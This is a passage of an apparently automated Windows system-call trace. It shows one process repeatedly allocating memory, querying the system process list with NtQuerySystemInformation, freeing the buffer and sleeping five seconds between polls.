Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.178] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.194] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.209] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.224] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.240] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.255] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.271] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.283] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.288] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.303] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.318] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.331] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.333] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.350] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.362] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.365] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.382] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.398] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.414] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.430] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.443] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.458] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.475] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.489] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 